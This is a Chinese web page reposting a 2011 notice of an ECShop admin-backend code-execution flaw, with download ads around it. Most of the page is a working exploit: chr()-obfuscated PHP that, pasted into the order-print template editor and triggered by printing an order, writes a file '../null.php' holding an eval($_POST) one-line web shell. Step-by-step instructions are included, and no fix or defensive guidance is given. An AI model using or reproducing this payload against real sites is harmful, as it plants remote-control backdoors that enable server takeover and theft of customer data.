文章详情

  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
php爱好者> php文档>ecshop后台获取shell通杀漏洞

ecshop后台获取shell通杀漏洞

时间:2011-03-19  来源:路人甲

发布日期:2011-03.18
发布作者:路人甲

影响版本:echop通
官方网站:http://www.echop.cn

漏洞类型:代码执行

漏洞分析:后台可以提交构造代码绕过过滤,成功解析生成一句话木马.
 

漏洞证明:

 <?php

 

$filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);

 

$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62);

 

$a=chr(119);

 

$fp=@fopen($filen,$a);

 

$msg=@fwrite($fp,$filec);

 

if($msg) echo chr(79).chr(75).chr(33);

 

@fclose($fp);

 

?>


 

后台-订单管理-订单打印-选择源代码编辑-保存
返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功!

 



 

 

标签分类:

相关阅读 更多 +
排行榜 更多 +
毒药轮盘手机版下载

毒药轮盘手机版下载

休闲益智 下载
剑侠情缘零b服手游下载

剑侠情缘零b服手游下载

角色扮演 下载
惊魂动物园游戏手机版下载

惊魂动物园游戏手机版下载

冒险解谜 下载